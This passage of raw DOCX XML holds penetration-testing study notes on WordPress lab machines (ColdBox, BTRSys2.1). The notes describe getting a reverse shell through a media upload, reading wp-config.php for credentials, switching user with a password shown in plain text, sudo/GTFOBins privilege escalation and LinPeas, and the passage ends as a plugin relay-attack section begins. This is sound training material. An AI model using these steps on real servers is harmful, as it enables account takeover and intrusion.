                    <a:blip r:embed="rId984"/>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2DB3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="268"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Go to "Manage Media" </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002DB4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="268"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Start a listener </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002DB5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="268"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Click "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Uploads file</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">" and you should get a connection for reverse shell</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002DB6">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002DB7">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_5idqugp9vlgy" w:id="403"/>
      <w:bookmarkEnd w:id="403"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to privilege escalate in Wordpress after getting terminal</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002DB8">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">From </w:t>
      </w:r>
      <w:hyperlink r:id="rId985">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:b w:val="1"/>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">ColdBoxEasy</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (PG Play) (</w:t>
      </w:r>
      <w:hyperlink r:id="rId986">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:b w:val="1"/>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://medium.com/@abinus2021/coldbox-easy-walkthrough-d6e78e6a455</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002DB9">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002DBA">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">For context, we just got a reverse shell from wordpress into the www-data account, but it's kind of useless. So, we want to priv esc. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002DBB">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002DBC">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">One place we should always look is the "/var/www/html" where the username and password of the user will be stored in the config files (wp-config)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002DBD">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002DBE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="694"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cd /var/www/html</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002DBF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="694"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cat wp-config.php</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002DC0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="694"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="4886856" cy="3015128"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="115" name="image114.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image114.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId987"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4886856" cy="3015128"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002DC1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="694"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Here, we got the username and password. Now we need to switch user.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002DC2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="694"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">su coldd</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002DC3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="694"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Type in the password: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cybersecurity</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002DC4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="694"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Now we are logined in as c0ldd and now try to access the files.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002DC5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="694"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cd /home/coldd</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002DC6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="694"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cat user.txt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002DC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="694"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="977900"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="400" name="image394.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image394.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId988"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943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2DC8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="694"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We can tell that this encrypted due to the "==" at the end, which is Base64</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002DC9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="694"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We got the user flag which is in encrypted format (base64 format since it ends in "=="). We need to decrypt it. We can use a site called "cyberchef".</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002DCA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="694"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We got the flag but it is in spanish language. By using google translator we can translate this into english.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002DCB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="694"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We have successfully found the user flag. Now we need to find the root flag.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002DCC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="694"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Here they then did "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo -l</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">", found </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/usr/bin/ftp</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, put it in GTFOBins, and used the sudo section to priv esc to admin, where they found a base64 encoded flag, so they decoded, and then translated from spanish to english</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002DCD">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002DCE">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In general, looking at the</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> wp-admin </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">page is also good since it's a login page, and if you have credentials than it's useful </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002DCF">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002DD0">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">From the </w:t>
      </w:r>
      <w:hyperlink r:id="rId989">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:b w:val="1"/>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">BTRSys2.1</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PG Play:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002DD1">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002DD2">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We saw another way to privilege escalate after getting reverse shell from WordPress. We ran LinPeas and looked at the "Analyzing Wordpress Files" section and the "Searching Wordpress wp-config.php files" section which gave us MySQL credentials for root.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002DD3">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002DD4">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">These sections looked at the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">wp-config.php</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> files</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002DD5">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002DD6">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002DD7">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002DD8">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_1kvjj0wmnepv" w:id="404"/>
      <w:bookmarkEnd w:id="404"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Abuse Backup Migration plugin and Relay Attack for priv esc</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002DD9">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002DDA">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">From XXXXXXXXX (27.5.2. Abuse a WordPress Plugin for a Relay Attack)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002DDB">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002DDC">
      <w:pPr>
        <w:spacing w:after="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In the previous section, we retrieved the plaintext password for </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">daniela</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and gained access to the WordPress dashboard on INTERNALSRV1. Let's review some of the settings and plugins.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002DDD">
      <w:pPr>
